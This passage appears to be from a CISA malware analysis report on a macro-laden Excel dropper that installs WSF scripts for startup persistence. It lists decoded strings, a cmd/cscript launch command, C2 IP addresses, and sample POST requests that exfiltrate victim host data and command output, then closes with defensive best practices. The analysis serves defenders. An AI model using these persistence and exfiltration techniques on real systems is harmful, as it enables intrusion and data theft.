  Connection: Keep-Alive
  
  Content-Type: application/x-www-form-urlencoded; Charset=UTF-8
  
  Accept: */*
  
  Accept-Language: en-us
  
  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  
  CharSet: UTF-8
  
  Content-Length: 93
  
  Host: 88.119.170.124
• POST /lcekcnkxkbllmwlpoklgof HTTP/1.1
  
  Connection: Keep-Alive
  
  Content-Type: application/x-www-form-urlencoded; Charset=UTF-8
  
  Accept: */*
  
  Accept-Language: en-us
  
  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  
  CharSet: UTF-8
  
  Content-Length: 9813
  
  Host: 88.119.170.124

Whois

Domain Name: bacloud.info

Registry Domain ID: 9ae51aee8f3144059e17d8f8fba3095e-DONUTS

Registrar WHOIS Server: whois.PublicDomainRegistry.com

Registrar URL: http://www.PublicDomainRegistry.com

Updated Date: 2021-03-09T06:39:04Z

Creation Date: 2010-04-22T12:46:58Z

Registry Expiry Date: 2022-04-22T12:46:58Z

Registrar: PDR Ltd. d/b/a PublicDomainRegistry.com

Registrar IANA ID: 303

Registrar Abuse Contact Email: abuse@publicdomainregistry.com

Registrar Abuse Contact Phone: +91.2230797500

Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited

Registry Registrant ID: REDACTED FOR PRIVACY

Registrant Name: REDACTED FOR PRIVACY

Registrant Organization: GDPR Masked

Registrant Street: REDACTED FOR PRIVACY

Registrant City: REDACTED FOR PRIVACY

Registrant State/Province: GDPR Masked

Registrant Postal Code: REDACTED FOR PRIVACY

Registrant Country: US

Registrant Phone: REDACTED FOR PRIVACY

Registrant Phone Ext: REDACTED FOR PRIVACY

Registrant Fax: REDACTED FOR PRIVACY

Registrant Fax Ext: REDACTED FOR PRIVACY

Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.

Registry Admin ID: REDACTED FOR PRIVACY

Admin Name: REDACTED FOR PRIVACY

Admin Organization: REDACTED FOR PRIVACY

Admin Street: REDACTED FOR PRIVACY

Admin City: REDACTED FOR PRIVACY

Admin State/Province: REDACTED FOR PRIVACY

Admin Postal Code: REDACTED FOR PRIVACY

Admin Country: REDACTED FOR PRIVACY

Admin Phone: REDACTED FOR PRIVACY

Admin Phone Ext: REDACTED FOR PRIVACY

Admin Fax: REDACTED FOR PRIVACY

Admin Fax Ext: REDACTED FOR PRIVACY

Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.

Registry Tech ID: REDACTED FOR PRIVACY

Tech Name: REDACTED FOR PRIVACY

Tech Organization: REDACTED FOR PRIVACY

Tech Street: REDACTED FOR PRIVACY

Tech City: REDACTED FOR PRIVACY

Tech State/Province: REDACTED FOR PRIVACY

Tech Postal Code: REDACTED FOR PRIVACY

Tech Country: REDACTED FOR PRIVACY

Tech Phone: REDACTED FOR PRIVACY

Tech Phone Ext: REDACTED FOR PRIVACY

Tech Fax: REDACTED FOR PRIVACY

Tech Fax Ext: REDACTED FOR PRIVACY

Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.

Name Server: dns1.laisvas.lt

Name Server: ns3.laisvas.lt

Name Server: ns5.laisvas.lt

DNSSEC: unsigned

URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/

>>> Last update of WHOIS database: 2022-02-01T10:54:20Z <<

Relationships

Description

The malware C2 IP address.

4b2862a1665a62706f88304406b071a5c9a6b3093daadc073e174ac6d493f26c

Tags

downloaderdropperloadertrojan

Details

Antivirus

YARA Rules

No matches found.

ssdeep Matches

No matches found.

Relationships

Description

This artifact is a malicious Excel file that contains macros written in VBA and two encoded wsf files. When the Excel file is opened, the victim will be prompted to enable macros with the “Enable Content” button. The macros are executed once the victim enables content. When executed, the macros decode and install the embedded wsf files into the directories below:



--Begin files--

"%LocalAppData\Outlook.wsf"

"%AppData%\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Outlook.wsf"

--End files--

Screenshots

ed988768f50f1bb4cc7fb69f9633d6185714a99ecfd18b7b1b88a42a162b0418

Details

Antivirus

No matches found.

YARA Rules

No matches found.

ssdeep Matches

No matches found.

Relationships

Description

This artifact is a wsf file installed by ZaibCb15Ak.xls (4b2862a1665a62706f88304406b071a5c9a6b3093daadc073e174ac6d493f26c). This file is installed into the current user startup folder to run automatically at startup. The file contains hex-encoded strings that have been reshuffled. When executed, the malware uses built-in algorithms to arrange and hex decode these strings.



Displayed below are strings of interest decoded during runtime:



--Begin strings--

"vqFIPLLYRjbxR8Km3m9p1ACzyK4Zps20.run PprJwVD1jVboW9s2WjL9uCH1Jk02tisB,0,TRUE"

"cmd.exe /c cscript.exe %LocalAppData%\\Outlook.wsf humpback__whale"

--End strings--



It executes the command below to run the wsf file "%LocalAppData%\Outlook.wsf (d77e268b746cf1547e7ed662598f8515948562e1d188a7f9ddb8e00f4fd94ef0) with the argument "humpback__whale".



Displayed below is the command:



--Begin command--

"cmd.exe /c cscript.exe %LocalAppData%\\Outlook.wsf humpback__whale"

--End command--

Screenshots

d77e268b746cf1547e7ed662598f8515948562e1d188a7f9ddb8e00f4fd94ef0

Tags

downloaderloadertrojan

Details

Antivirus

YARA Rules

No matches found.

ssdeep Matches

No matches found.

Relationships

Description

This artifact is a wsf file installed by ZaibCb15Ak.xls (4b2862a1665a62706f88304406b071a5c9a6b3093daadc073e174ac6d493f26c)

and executed by Outlook.wsf (ed988768f50f1bb4cc7fb69f9633d6185714a99ecfd18b7b1b88a42a162b0418) . This file and "Outlook.wsf (f10471e15c6b971092377c524a0622edf4525acee42f4b61e732f342ea7c0df0) have similar code functions. The file contains hex-encoded strings that have been reshuffled. When executed, the malware uses built-in algorithms to arrange and hex decode these strings.



Displayed below are strings of interest decoded during runtime:



--Begin strings--

{impersonationLevel=impersonate}!\\\\

%AppData%\\Local\\Temp\\stari.txt

stari.txt

jznkmustntblvmdvgcwbvqb

oeajgyxyxclqmfqayv

http[:]//5[.]199[.]133[.]149/

POST

cmd.exe /c

>> %temp%\\stari.txt

Select * from Win32_IP4RouteTable

"%COMPUTERNAME%"

"%USERNAME%"

E442779124B3E37D2A3F77D77B66A.Open jQ8EVB2A05RmlH0YGkge7CpSBNWN1n2d,KVj42Vxufd0LRBFfZDVj3wRxJ5CX9vOX,False

E442779124B3E37D2A3F77D77B66A.send jQ8EVB2A05RmlH0YGkge7CpSBNWN1n2d

--End strings--



It collects the victim's system IP address, computer name, and username in the format below:



--Begin information--

Format: [victim's system Internet Protocol address]|!)!)!|[Computer name]/Username

Sample: "19x.1xx.2xx.2xx|!)!)!|WIN-HVMLL1IR74C/user01"

--End information--



The collected data above is hex-encoded, and the hex bytes are reshuffled and appended to a string "vl" before exfiltration. It will send the encoded data using the URI: "http[:]//5[.]199[.]133[.]149/jznkmustntblvmdvgcwbvqb" and wait for a response.



Displayed below is the POST request used to exfiltrate the victim's system data:



--Begin request--

POST /jznkmustntblvmdvgcwbvqb HTTP/1.1

Connection: Keep-Alive

Content-Type: application/x-www-form-urlencoded; Charset=UTF-8

Accept: */*

Accept-Language: en-us

User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

CharSet: UTF-8

Content-Length: 93

Host: 5[.]199[.]133[.]149



vl=6793263635E4329334937215349F743442D53463ED3....7CC2212199221C5494228E4F70322D38562E3E6212713

--End request---



The response payload was not available for analysis. Analysis indicates that the C2 response payloads are hex-encoded and reshuffled. It uses the same built in algorithm to arrange and hex decode these payloads, which contain command-line scripts. The malware will search for the string "|!)!)!|" or "/!&^^&!/" in the decoded payload. If the payload contains one of these strings, it will parse the command-line scripts for execution using the command below:



--Begin command--

"cmd.exe /c [decoded command scripts]| >> %temp%\\stari.txt"

--End command--



The output of the command-line scripts executed is stored into a text file "%temp%\stari.txt". It reads the output of the command executed from the text file "%temp%\stari.txt" and attaches it to the victim's system IP address, computer name, and username in the format below:



--Begin format--

Format: "[victim's system Internet Protocol address]|!)!)!|[Computer name]/Username|!)!)!|[Output of the command executed]"



Sample: "19x.1xx.2xx.2xx|!)!)!|WIN-HVMLL1IR74C/user01|!)!)!|\r\nWindows IP Configuration\r\n\r\n\r\nEthernet adapter Local Area Connection 2:\r\n\r\n Connection-specific DNS Suffix . : \r\n Link-local IPv6 Address . . . . . : fe80::d1d7:d838:2959:23d0%15\r\n IPv4 Address. . . . . . . . . . . : 19x.1xx.2xx.1xx\r\n Subnet Mask . . . . . . . . . . . : 255.255.255.0\r\n Default Gateway . . . . . . . . . : 19x.1xx.2xx.2xx\r\n\r\nEthernet adapter Local Area Connection:\r\n\r\n Media State . . . . . . . . . . . : Media disconnected\r\n Connection-specific DNS Suffix . : \r\n\r\nTunnel adapter isatap.{62D6C817-FD7E-4634-83CF-3311F44F4490}:\r\n\r\n Media State . . . . . . . . . . . : Media disconnected\r\n Connection-specific DNS Suffix . : \r\n\r\nTunnel adapter Teredo Tunneling Pseudo-Interface:\r\n\r\n Connection-specific DNS Suffix . : \r\n IPv6 Address. . . . . . . . . . . : 2001:0:c000:27b:c2f:3a2f:3f57:2e63\r\n Link-local IPv6 Address . . . . . : fe80::c2f:3a2f:3f57:2e63%12\r\n Default Gateway . . . . . . . . . : ::\r\n\r\nTunnel adapter isatap.{43E8EDE4-433A-453E-B583-1A994D8B33E2}:\r\n\r\n Media State . . . . . . . . . . . : Media disconnected\r\n Connection-specific DNS Suffix . : \r\n"

--End format--



The above victim's system information and the output command executed are hex-encoded, and the hex bytes are re-ordered and appended to a string "vl" before exfiltration. It will send the encoded data using the URI: "http[:]//5[.]199[.]133[.]149/oeajgyxyxclqmfqayv" and wait for a response (next command).



Displayed below is the POST request used to exfiltrate the victim's system data and the output of the command executed:



--Begin request--

POST /oeajgyxyxclqmfqayv HTTP/1.1

Connection: Keep-Alive

Content-Type: application/x-www-form-urlencoded; Charset=UTF-8

Accept: */*

Accept-Language: en-us

User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

CharSet: UTF-8

Content-Length: 93

Host: 5[.]199[.]133[.]149



vl=[re-ordered hex-encoded victim's system data and the output of the command executed]

--End request---



Displayed below is sample POST request that contains the encoded victim's system data and the output of the command executed:



--Begin request--

POST /oeajgyxyxclqmfqayv HTTP/1.1

Connection: Keep-Alive

Content-Type: application/x-www-form-urlencoded; Charset=UTF-8

Accept: */*

Accept-Language: en-us

User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

CharSet: UTF-8

Content-Length: 5689

Host: 5[.]199[.]133[.]149



vl=A093273633E2339332927212329A723242D6E6D346365E7226F246E76227271E265674D6469267477C024204601063744215623203A2E202222279426216621227E272052222220296E226262EE60400253446D462D44260577314D223435023231473A36633635F6363270303E6237320E36206220200A20200622222420254226220E277022607260664E0262622E60702762560422202200322222740672742E644C265242C0425E2221722E62705272603A4020542422802228422026422424022322402D2E3223225E20200660602A7268D767776040216727020C2231422D2671726F066777692050634720DA626026606623722F0262662360692262650022262600023E62700060622460632664660F666E6260425E372002262220202E22222209222522232220222F5322222D647E2772571B626F266C472922203302022033782744368C46347730376E4030023232204D2E4235323A254063323379364643463325313062267410766E6660262E627042626220236E2262620E52002206002A62603762763F422947262799202026202625252E0224225E207056776000277C7670664F564C0446736040246622020E32302230222022260322232420272622230A2225232026206475F5706605247502746090664967232464062557626260706E6267720E2630722D32406631A33633683E3042376308366526693664363D6266256523256226273B222032242200706E3260622E263022544335666263606365676DD24624652F0577272644667162656260765EE234324E3330223563093661636A33796235403262203433273034513230223E3240362E3226227E292072272300262563292323222052222420207026627604624524307220422E0222022E706022223200222032202241262202666265606052226202657152707224636A02636433707547252740040E6244227E262002262220292E6326235226266220236E26260022622E6D62046046D65240264D276E270052364260333E6232328536326634306D3734963236243134273227302223262527252223D6222624232E20227040637D266142336264326472206D5E3222225E036022656240627D564422046473267256E4646D4261645F62751726666D69756656262022232524262922201222202A2120262227C92229262E222E6260527262206A7E224322AE2400662436082220C572634061707526569446226260666E666406772060606067666601626146202763060E0206326E606022726200624022606222627402226251606A72606443522526626644665E6276622E7060626622F0666E2372565307005272674F203E66272701272F722D26226264A262622E2A60226277ED727A376E666C6664E77377302E21660307.........EC2C602658246E29E3302A60EE602E600E422E50E5206E6E7E607E209E0E0E202E703E6E052D2E6EE07E232F0E20702E4A2D2E2DAE2E29240A22252E99265D2F0320602900234705142E5F477A2F2C6106612927EC2622250E244D2F8F230420F2397E6CEC225648F56E59609C61706199604C4410625E607022202856253E521D013

--End request---



It is designed to send these messages below to the C2 server using the URI: "http[:]//5[.]199[.]133[.]149/oeajgyxyxclqmfqayv". Each message sent is hex-encoded, and the hex bytes are re-ordered and appended to a string "vl":



--Begin message format--

"200/!&^^&!/19x.1xx.2xx.2xx|!)!)!|WIN-HVMLL1IR74C/user01" ==> When the decoded C2 command data received contains the string "|!)!)!|" or "/!&^^&!/".

"19x.1xx.2xx.2xx|!)!)!|WIN-HVMLL1IR74C/user01|!)!)!|sory" ==> When a command or a specific task fails

--End message format--

Screenshots

5.199.133.149

Tags

command-and-control

Ports

• 80 TCP

HTTP Sessions

• POST /jznkmustntblvmdvgcwbvqb HTTP/1.1
  
  Connection: Keep-Alive
  
  Content-Type: application/x-www-form-urlencoded; Charset=UTF-8
  
  Accept: */*
  
  Accept-Language: en-us
  
  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  
  CharSet: UTF-8
  
  Content-Length: 93
  
  Host: 5.199.133.149
• POST /oeajgyxyxclqmfqayv HTTP/1.1
  
  Connection: Keep-Alive
  
  Content-Type: application/x-www-form-urlencoded; Charset=UTF-8
  
  Accept: */*
  
  Accept-Language: en-us
  
  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  
  CharSet: UTF-8
  
  Content-Length: 93
  
  Host: 5[.]199[.]133[.]149

Whois

Domain Name: SERVDISCOUNT-CUSTOMER.COM

Registry Domain ID: 1882350046_DOMAIN_COM-VRSN

Registrar WHOIS Server: whois.psi-usa.info

Registrar URL: http://www.psi-usa.info

Updated Date: 2021-10-28T07:05:37Z

Creation Date: 2014-10-27T07:58:37Z

Registry Expiry Date: 2022-10-27T07:58:37Z

Registrar: PSI-USA, Inc. dba Domain Robot

Registrar IANA ID: 151

Registrar Abuse Contact Email: domain-abuse@psi-usa.info

Registrar Abuse Contact Phone: +49.94159559482

Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited

Name Server: NS1.NTDNS.DE

Name Server: NS2.NTDNS.DE

Name Server: NS3.NTDNS.DE

DNSSEC: unsigned

URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/

>>> Last update of whois database: 2022-01-31T07:23:45Z <<<

Relationships

Description

The malware C2 IP address.

CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization's systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.

• Maintain up-to-date antivirus signatures and engines.
• Keep operating system patches up-to-date.
• Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
• Restrict users' ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
• Enforce a strong password policy and implement regular password changes.
• Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
• Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
• Disable unnecessary services on agency workstations and servers.
• Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its "true file type" (i.e., the extension matches the file header).
• Monitor users' web browsing habits; restrict access to sites with unfavorable content.
• Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).
• Scan all software downloaded from the Internet prior to executing.
• Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).

Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, "Guide to Malware Incident Prevention & Handling for Desktops and Laptops".

• 1-888-282-0870
• CISA Central (UNCLASS)
• CISA SIPR (SIPRNET)
• CISA IC (JWICS)

CISA continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: https://us-cert.cisa.gov/forms/feedback/

What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

What is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

Can I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to the CISA at 1-888-282-0870 or CISA Service Desk.

Can I submit malware to CISA? Malware samples can be submitted via three methods:

• Web: https://malware.us-cert.gov
• E-Mail: submit@malware.us-cert.gov
• FTP: ftp.malware.us-cert.gov (anonymous)

CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on CISA's homepage at www.cisa.gov.